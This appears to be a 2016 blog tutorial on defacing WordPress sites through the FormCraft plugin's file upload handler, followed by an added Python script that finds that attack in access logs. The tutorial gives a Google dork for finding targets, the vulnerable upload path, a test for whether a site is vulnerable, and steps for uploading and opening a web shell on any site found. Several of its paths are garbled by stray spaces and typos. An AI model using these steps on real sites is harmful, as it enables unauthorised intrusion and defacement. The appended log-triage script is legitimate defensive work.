Monday, August 1, 2016

WORDPRESS FORMCRAFT EXPLOIT

This time I will share a deface tutorial for the WordPress plugin FormCraft. Follow my steps gradually; don't rush.
Requirements:
- Shell
- CSRF script

Save the script with an .html extension, for example: csrf.html
STEPS
1. Go to www.google.com and paste this dork:
inurl:/wp-content/plugins/formcraft
2. Then select any web
3. And enter the following exploits:
/wp-content/plugins/formcraft/file- upload/server/php/upload.php
E.g site.com/wp-content/plugins/formcraft/file- upload/server/php/upload.php
4. If the site is vulnerable, you will see something like this on a blank white page: ( "failed": "No files found") or files []
5. The next step is to open the CSRF script.
6. Copy and paste the vulnerable site into the CSRF script.
7. Save it, then open a shell server and upload the CSRF script you edited earlier.
8. Then run your uploaded script, e.g. www.site.com/csrf.html
9. A new blank white page will open; upload your own shell there.
10. If the shell is uploaded successfully, it will appear with a random simple name: 19860ab123abcd--blabla.php
Lastly Access your shell at http:// www.site.com/wp-content/plugins/ formcraft/fileupload/server/php/files/nameshellrandom.php
wp-content/plugins/ formcraft / sile upload/server/php/ file/ 154897dc834ecb---blabla.php
That's all. I hope you understand the tutorial. If not, you are free to contact the admin. Goodbye!
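
For defenders, the request sequence in the steps above leaves a recognisable trail in web server access logs. The following is an added example, not part of the original post: a Python triage script over constructed combined-format log lines, where the function name `triage`, the severity labels and the sample IP addresses are assumptions.

```python
import re

# Paths as written in the post. The post spells the directories several ways
# (file-upload / fileupload, files / file), so the patterns accept each form.
BASE = r"/wp-content/plugins/formcraft/file-?upload/server/php/"
UPLOAD_RE = re.compile(BASE + r"upload\.php(?:\?|$)", re.I)
DROPPED_RE = re.compile(BASE + r"files?/[^?\s]+\.ph(?:p\d?|tml)(?:\?|$)", re.I)
# Combined log format: ip - - [timestamp] "METHOD path HTTP/x" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def triage(lines):
    """Return findings as (severity, ip, timestamp, reason) tuples."""
    findings = []
    uploaders = set()  # clients that successfully POSTed to the upload handler
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        ok = status.startswith("2")
        if UPLOAD_RE.search(path):
            if method == "POST" and ok:
                uploaders.add(ip)
                findings.append(("high", ip, ts, "file POSTed to upload handler"))
            elif method == "GET":
                findings.append(("low", ip, ts, "probe of upload handler"))
        elif DROPPED_RE.search(path) and ok:
            # A PHP file served from the upload directory is a likely web shell;
            # the same client having uploaded just before makes it near certain.
            sev = "critical" if ip in uploaders else "high"
            findings.append((sev, ip, ts, "PHP served from upload dir: " + path))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
P = "/wp-content/plugins/formcraft/file-upload/server/php/"
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2016:10:00:01 +0000] "GET %supload.php HTTP/1.1" 200 31 "-" "-"' % P,
    '203.0.113.7 - - [01/Aug/2016:10:02:10 +0000] "POST %supload.php HTTP/1.1" 200 412 "-" "-"' % P,
    '203.0.113.7 - - [01/Aug/2016:10:02:30 +0000] "GET %sfiles/19860ab123abcd--blabla.php HTTP/1.1" 200 5120 "-" "-"' % P,
    '198.51.100.4 - - [01/Aug/2016:10:05:00 +0000] "GET %sfiles/photo.jpg HTTP/1.1" 200 20480 "-" "-"' % P,
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(*finding, sep=" | ")
```

A "critical" finding means the uploaded file was served as PHP; denying PHP execution in that upload directory prevents an uploaded file from running.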
